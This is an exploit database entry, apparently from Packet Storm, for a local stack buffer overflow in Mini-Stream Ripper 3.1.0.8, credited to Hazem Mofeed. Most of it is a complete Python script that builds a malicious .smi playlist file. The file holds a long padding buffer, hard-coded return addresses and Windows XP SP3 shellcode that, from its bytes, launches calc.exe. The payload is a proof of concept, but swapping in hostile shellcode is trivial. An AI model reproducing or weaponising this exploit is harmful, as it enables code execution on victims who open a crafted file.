Mini-Stream Ripper 3.1.0.8 Stack Overflow

2010-03-28T00:00:00
ID PACKETSTORM:87682
Type packetstorm
Reporter Hazem Mofeed
Modified 2010-03-28T00:00:00

Description

                                        
                                            `# Mini-stream Ripper 3.1.0.8 => Local stack overflow exploit  
# Author: Hazem Mofeed  
# Download: http://www.mini-stream.net/mini-stream-ripper/download/  
# Home: http://hakxer.wordpress.com  
  
# [BUFFER] + [ RET ] + [ RET ] + [SHELLCODE] --> Exploited ..  
# http://www.exploit-db.com/exploits/11607  
shellcode = ("\xeb\x16\x5b\x31\xc0\x50\x53\xbb\x0d\x25\x86\x7c\xff\xd3\x31\xc0"  
"\x50\xbb\x12\xcb\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63\x61\x6c"  
"\x63\x2e\x65\x78\x65\x00") # SP3(sh)  
  
# exploit  
exploit = ("\x41" * 43496 + "\x08\x6A\x83\x7C" + "\x08\x6A\x83\x7C" + shellcode )  
file = open("exploit.smi","w")  
file.write(exploit)  
file.close()  
  
`